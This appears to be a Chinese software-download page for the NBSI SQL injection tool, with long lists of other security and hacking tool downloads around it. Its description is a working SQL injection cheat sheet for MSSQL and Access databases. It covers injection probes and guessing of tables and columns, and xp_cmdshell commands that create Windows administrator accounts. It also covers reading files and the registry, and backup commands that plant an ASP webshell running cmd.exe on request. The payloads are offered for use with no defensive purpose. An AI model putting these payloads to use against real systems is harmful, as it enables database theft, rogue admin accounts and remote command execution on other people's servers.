IT猫扑网 ● 安全相关

分类分类

NBSI注入漏洞检测工具

v3.0.1 绿色中文版

大小：119.00 KB更新：2018/11/08

类别：~~系统安全~~系统：Winll

解压密码：www.itmop.com

NBSI注入漏洞检测工具是一款功能强大的软件，由vb语言编写的网站漏洞检测工具的名称，ASP注入漏洞检测工具，特别在sql server注入检测方面有极高的准确率。

NBSI介绍

1.判断是否有注入

;and 1=1

;and 1=2

2.初步判断是否是mssql

;and user>0

3.判断数据库系统

;and (select count(*) from sysobjects)>0 mssql

;and (select count(*) from msysobjects)>0 access

4.注入参数是字符

'and [查询条件] and ''='

5.搜索时没过滤参数的

'and [查询条件] and '%25'='

6.猜数据库

;and (Select Count(*) from [数据库名])>0

7.猜字段

;and (Select Count(字段名) from 数据库名)>0

8.猜字段中记录长度

;and (select top 1 len(字段名) from 数据库名)>0

9.(1)猜字段的ascii值（access）

;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0

(2)猜字段的ascii值（mssql）

;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0

10.测试权限结构（mssql）

;and 1=(SELECT IS_SRVROLEMEMBER('sysadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('serveradmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('setupadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('securityadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('diskadmin'));--

;and 1=(SELECT IS_SRVROLEMEMBER('bulkadmin'));--

;and 1=(SELECT IS_MEMBER('db_owner'));--

11.添加mssql和系统的帐户

;exec master.dbo.sp_addlogin username;--

;exec master.dbo.sp_password null,

username,password;--

;exec master.dbo.sp_addsrvrolemember sysadmin

username;--

;exec master.dbo.xp_cmdshell 'net user username

password /workstations:* /times:all

/passwordchg:yes /passwordreq:yes /active:yes /add'

;--

;exec master.dbo.xp_cmdshell 'net user username

password /add';--

;exec master.dbo.xp_cmdshell 'net localgroup

administrators username /add';--

12.(1)遍历目录

;create table dirs(paths varchar(100), id int)

;insert dirs exec master.dbo.xp_dirtree 'c:'

;and (select top 1 paths from dirs)>0

;and (select top 1 paths from dirs where paths not

in('上步得到的paths'))>)

(2)遍历目录

;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));--

;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器

;insert into temp(id) exec master.dbo.xp_subdirs 'c:';-- 获得子目录列表

;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:';-- 获得所有子目录的目录树结构

;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:webindex.asp';-- 查看文件的内容

13.mssql中的存储过程

xp_regenumvalues 注册表根键, 子键

;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersionRun' 以多个记录集方式返回所有键值

xp_regread 根键,子键,键值名

;exec xp_regread 'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersion',

'CommonFilesDir' 返回制定键的值

xp_regwrite 根键,子键, 值名, 值类型, 值

值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型

;exec xp_regwrite 'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersion',

'TestValueName','reg_sz','hello' 写入注册表

xp_regdeletevalue 根键,子键,值名

exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersion',

'TestValueName' 删除某个值

xp_regdeletekey 'HKEY_LOCAL_MACHINE',

'SOFTWAREMicrosoftWindowsCurrentVersionTestkey' 删除键,包括该键下所有值

14.mssql的backup创建webshell

use model

create table cmd(str image);

insert into cmd(str) values ('<% Dim oScript %>');

backup database model to disk='c:l.asp';

15.mssql内置函数

;and (select @@version)>0 获得Windows的版本号

;and user_name()='dbo' 判断当前系统的连接用户是不是sa

;and (select user_name())>0 爆当前系统的连接用户

;and (select db_name())>0 得到当前连接的数据库

16.简洁的webshell

use model

create table cmd(str image);

insert into cmd(str) values ('<%=server.createobject(&wscript.shell&).exec(&cmd.exe /c &&request(&c&)).stdout.readall%>');

backup database model to disk='g:wwwtestl.asp';

请求的时候，像这样子用：

http://ip/l.asp?c=dir

精品推荐

猜你喜欢

sql注入工具
漏洞扫描工具

sql注入工具更多>>

sql注入工具能够轻松的进行sql的注入操作,软件功能一般都比较丰富,并且专业性强,是非常强大的软件工具,感兴趣的朋友们千万不要错过哦!快来IT猫扑下载吧!

漏洞扫描工具更多>>

系统漏洞扫描工具有哪些?一般分为web漏洞扫描器,java漏洞扫描工具,网站漏洞扫描工具,漏洞扫描系统,asp漏洞扫描软件等几个大类,所以小编在这里便为大家带来了漏洞扫描软件大全,有需要的朋友可根据自己的实际情况挑选下载!

同类推荐

未知地区APP

相关下载

2018 FIFA World Cup Russia详情

360cpu漏洞一键免疫工具详情

3ds转cia工具一键转换(3ds simple cia converter)详情

18轮货车模拟驾驶中文版(Impossible 18 Wheeler Truck)详情

17路巴士模拟无限金币版(Bus Simulator 17)详情

the mole工具(自动化SQL注入工具)详情

明小子sql注入工具详情

Havij pro(自动化SQL注入工具)详情

pangolin(穿山甲sql注入工具)详情

蚂蚁sql注入工具详情

bsql hacker(SQL自动注入工具)详情

100个任务汉化版破解版(100 Missions)详情

360勒索病毒漏洞修复工具详情

阿拉丁读心术vip破解版详情

360随身wifi(SSID)修改工具详情

360系统漏洞修复独立版详情

.NET版本检测工具(.NET Version Detector)详情

360安全卫士漏洞补丁检测模块详情

Recover4all Professional详情

《PHP100视频教程》三十二：PHP5中Cookie与 Session详解详情

最新排行
最热排行
评分最高

安全相关排行榜

腾讯电脑管家pc版安装包系统安全62.96 MBv15.4.22893.220 官方最新版
详情
腾讯电脑管家离线安装包(QQPCMgr)系统安全62.96 MBv15.4.22893.220 官方安装版
详情
联想电脑管家非联想电脑通用版系统安全173.00 MBv5.0.10.4141 最新版
详情
Sandboxie Plus沙盒32位/64位系统安全30.90 MBv1.0.20 中文免费版
详情
联想电脑管家游戏定制版系统安全126.35 MBv3.0.310.3102 官方版
详情
希沃管家系统安全108.00 MBv1.2.4.2620 官方版
详情
荣耀magicbook电脑管家系统安全232.19 MBv13.0.2.310 官方版
详情
微软Windows scripts系统安全1.40 MBv5.6 绿色免费版
详情
2022腾讯电脑管家体验版系统安全1.89 MBv16.0.23595.221 官方版
详情
360安全卫士国产系统适配专版系统安全62.55 MBv1.0.0.1018 官方版
详情
360安全卫士漏洞补丁检测模块系统安全5.21 MB绿色独立版
详情
2345安全卫士电脑版系统安全95.54 MBv7.9.1.13925 官方正式版
详情
QQ医生免费版(QQDoctor)系统安全7.51 MBv3.3 绿色版
详情
QQ电脑管家纯净版(QQguanjia)系统安全62.96 MBv12.0 官方最新版
详情
CFMMC期货市场监控中心安全控件系统安全7.83 MBv5.0.8 安装版
详情
IObit Security 360系统安全10.70 MBv1.61 多国语言官方安装版
详情
微软恶意软件删除工具Software Removal Tool系统安全8.58 MBv2.14 多国语言版
详情
天融信终端防御系统系统安全14.70 MBv1.0.13.1 安装版
详情
腾讯电脑管家8.0正式版系统安全30.60 MBv8.0 官方免费版
详情
火绒安全Log4j2漏洞缓解工具系统安全147.00 KBv1.1 安装版
详情
PowerTool破解版(手动杀毒工具)系统安全992.00 KBv4.3 绿色免费版_64位
详情
Trojan Remover(特洛伊木马专杀工具)系统安全32.63 MBv6.9.2.2933 特别版
详情
卡巴斯基(KIS)Kaspersky Internet Security系统安全40.87 MBv2009(8.0.0.506) 汉化免费版
详情
华为电脑管家第三方电脑安装版系统安全184.00 MBv11.1.6.31 最新版
详情
360电脑管家最新版2023(安全卫士)系统安全83.93 MBv13.0.0.2079 官方正式版
详情
瑞星卡卡上网安全助手6.0系统安全10.15 MBv6.2.4.63 官方安装版
详情
卡巴斯基全功能安全软件2011(Kaspersky Internet Security)系统安全112.00 MBv11.0.2.556 麦田守望者汉化增强版
详情
铠甲安全卫士电脑管家系统安全24.78 MBv2.0 官方版
详情
HashTab系统安全3.59 MBv6.0.0.34 绿色汉化版
详情
腾讯电脑管家win10专版系统安全1.95 MBv15.0.22122.210 简体中文官方安装版
详情
WinMD5Sum(MD5校验工具)系统安全19.00 KBv1.0.1.55 官方中文版
详情
火绒安全软件包含扩展工具完整版系统安全21.99 MBv5.0.72.1 官方个人免费版
详情
Microsoft Security Essentials for XP(微软mse杀毒软件)系统安全12.00 MBv4.4 简体中文版
详情
Md5Checker系统安全121.00 KBv3.3 免安装版
详情
ettercap for windows(强大的arp欺骗工具)系统安全6.26 MBv0.8.2 官网版
详情
金山毒霸CPU漏洞免疫工具系统安全1.62 MBv1.0 官方版
详情
Malwarebytes Anti-Malware(恶意程式移除工具)系统安全502.00 KBv4.4.4.126 多国语言版
详情
联想电脑管家thinkpad定制版系统安全272.00 MBv5.0.10.6271 官方版
详情
Havij pro(自动化SQL注入工具)系统安全6.30 MBv1.19 特别版
详情
wannacry2.0 病毒修复补丁最新版系统安全125.20 MB官方版
详情

点击查看更多

腾讯电脑管家离线安装包(QQPCMgr)系统安全62.96 MBv15.4.22893.220 官方安装版
详情
QQ电脑管家纯净版(QQguanjia)系统安全62.96 MBv12.0 官方最新版
详情
荣耀magicbook电脑管家系统安全232.19 MBv13.0.2.310 官方版
详情
腾讯电脑管家pc版安装包系统安全62.96 MBv15.4.22893.220 官方最新版
详情
pangolin(穿山甲sql注入工具)系统安全30.80 MBv4.1 绿色多语版
详情
华为电脑管家第三方电脑安装版系统安全184.00 MBv11.1.6.31 最新版
详情
火绒互联网安全软件系统安全22.07 MBv5.0.71.2-2022.11.21.1 官方版
详情
2022腾讯电脑管家体验版系统安全1.89 MBv16.0.23595.221 官方版
详情
火绒安全软件包含扩展工具完整版系统安全21.99 MBv5.0.72.1 官方个人免费版
详情
QQ电脑管家2022最新版系统安全62.12 MBv15.4.22893.220 官方版
详情
360安全卫士国产系统适配专版系统安全62.55 MBv1.0.0.1018 官方版
详情
瑞星卡卡上网安全助手6.0系统安全10.15 MBv6.2.4.63 官方安装版
详情
腾讯电脑管家个人版pc版系统安全62.96 MBv15.4.22893.220 官方正式版
详情
冰刃(IceSword)系统安全2.04 MBv1.22 免安装中文版
详情
ettercap for windows(强大的arp欺骗工具)系统安全6.26 MBv0.8.2 官网版
详情
超级巡警(Anti-Spyware Toolkit)系统安全12.59 MBv5.1.11.186 官方版
详情
腾讯电脑管家win10专版系统安全1.95 MBv15.0.22122.210 简体中文官方安装版
详情
360电脑管家最新版2023(安全卫士)系统安全83.93 MBv13.0.0.2079 官方正式版
详情
QQ医生免费版(QQDoctor)系统安全7.51 MBv3.3 绿色版
详情
RemoveIT Pro XT SE系统安全3.94 MBv2017.6.2 英文绿色免费版
详情
360安全保险箱(360Safebox)系统安全5.84 MBv5.0 绿色版
详情
BackTrack5 r3中文版iso系统安全3.09 GBU盘版
详情
HashMyFiles(MD5/SHA1效验)系统安全155.00 KBv2.25 官网绿色汉化版
详情
Microsoft Security Essentials for XP(微软mse杀毒软件)系统安全12.00 MBv4.4 简体中文版
详情
X-Scan中文版系统安全8.97 MBv3.3 汉化版
详情
腾讯电脑管家加速版系统安全40.00 MBv11.5.17454.208 绿色免费版
详情
360游戏保险箱系统安全9.18 MBv7.3.1.1011 官方正式版
详情
腾讯电脑管家8.0正式版系统安全30.60 MBv8.0 官方免费版
详情
海轩阁免杀工具包(海轩阁免杀包)系统安全346.00 MBv2017 最新免费版
详情
360系统漏洞修复独立版系统安全22.11 MBv9.6 绿色提取版
详情
联想电脑管家游戏定制版系统安全126.35 MBv3.0.310.3102 官方版
详情
腾讯电脑管家64位系统安全62.96 MBv15.1.22354.301 官方最新版
详情
冰刀(简称IS)系统安全2.05 MBv1.22 绿色中文版
详情
Sandboxie Plus沙盒32位/64位系统安全30.90 MBv1.0.20 中文免费版
详情
绿鹰安全精灵系统安全4.74 MBv6.96 简体中文版
详情
天融信终端防御系统系统安全14.70 MBv1.0.13.1 安装版
详情
卡巴斯基(KIS)Kaspersky Internet Security系统安全40.87 MBv2009(8.0.0.506) 汉化免费版
详情
微软恶意软件删除工具Software Removal Tool系统安全8.58 MBv2.14 多国语言版
详情
360安全卫士漏洞补丁检测模块系统安全5.21 MB绿色独立版
详情
QQ电脑管家强力查杀套装系统安全698.00 KBv2.0 简体中文官方安装版
详情

点击查看更多

360系统漏洞修复独立版系统安全22.11 MBv9.6 绿色提取版
详情
冰刃(IceSword)系统安全2.04 MBv1.22 免安装中文版
详情
网站安全狗系统安全36.90 MBv4.0.22290 官方iis版
详情
360游戏保险箱系统安全9.18 MBv7.3.1.1011 官方正式版
详情
超级巡警(Anti-Spyware Toolkit)系统安全12.59 MBv5.1.11.186 官方版
详情
ESET Smart Security(ESET NOD32 9.0安全套装)系统安全93.56 MBv9.0 中文免费版
详情
瑞星卡卡上网安全助手6.0系统安全10.15 MBv6.2.4.63 官方安装版
详情
2345安全卫士电脑版系统安全95.54 MBv7.9.1.13925 官方正式版
详情
乐网软件管家系统安全30.90 MBv2.0.0.0 绿色版
详情
QQ电脑管家2022最新版系统安全62.12 MBv15.4.22893.220 官方版
详情
腾讯电脑管家pc版安装包系统安全62.96 MBv15.4.22893.220 官方最新版
详情
360安全保险箱(360Safebox)系统安全5.84 MBv5.0 绿色版
详情
金山急救箱单文件版系统安全26.27 MBv3.5 免费绿色版
详情
蜂巢安全管家系统安全9.69 MBv3.0.2 官方最新版
详情
安全狗服云客户端系统安全13.52 MBv2.5.1 官网pc版
详情
火绒互联网安全软件系统安全22.07 MBv5.0.71.2-2022.11.21.1 官方版
详情
莱卡安全助手系统安全2.91 MBv2014.1112绿色版
详情
360闪电云鉴定器独立版系统安全2.83 MBv1.0.0.1030 官方绿色版
详情
腾讯电脑管家个人版pc版系统安全62.96 MBv15.4.22893.220 官方正式版
详情
金山毒霸CPU漏洞免疫工具系统安全1.62 MBv1.0 官方版
详情
QQ电脑管家强力查杀套装系统安全698.00 KBv2.0 简体中文官方安装版
详情
qq文件保险柜专用版系统安全5.50 MBv6.8 绿色中文版
详情
爱国者移动存储安全大师系统安全363.00 KBv2.1.0 绿色版
详情
铠甲安全卫士电脑管家系统安全24.78 MBv2.0 官方版
详情
腾讯电脑管家永恒之蓝补丁系统安全125.00 MB官方版
详情
2345安全卫士增强版PC电脑端(自带完整病毒库)系统安全314.92 MBv7.9.1.13925 官方最新版
详情
网吧电脑挂机锁系统安全558.00 KBv2.0 绿色版
详情
猫头鹰防关联系统安全89.60 MBv2.2.55 安装版
详情
菜鸟工具MD5哈希值查询工具系统安全357.00 KBv1.0 绿色版
详情
DWS Lite(Win10间谍杀手)系统安全81.00 KBv2.2.2.2 最新正式版
详情
ewido中文版(木马专杀)系统安全7.70 MBv3.5 绿色免费版
详情
卡巴斯基(Kaspersky Internet Security)系统安全35.29 MBv8.0.0.443 Beta 免费版
详情
金山卫士系统漏洞修复工具系统安全951.00 KB独立版
详情
Hash Tools(MD5哈希值校检工具)系统安全2.78 MBv4.1 绿色版
详情
Folder Firewall Blocker系统安全46.00 KBv1.2.1 免费版
详情
二级域名爆破工具系统安全544.00 KBv1.2 绿色版
详情
CFMMC期货市场监控中心安全控件系统安全7.83 MBv5.0.8 安装版
详情
挖掘鸡系统安全4.16 MBv9.2 绿色免费版
详情
360安全卫士8.9正式版系统安全58.89 MBv9.8 稳定版
详情
QQ电脑管家瘦身版系统安全31.34 MBv6.5 beta1 官方版
详情

点击查看更多

~~说两句~~网友评论

我要跟贴

取消

实时热词

联想电脑管家电脑隐私保护软件火绒安全电脑管家安全狗 sql注入工具免杀工具永恒之蓝补丁 md5校验工具安全卫士 QQ电脑管家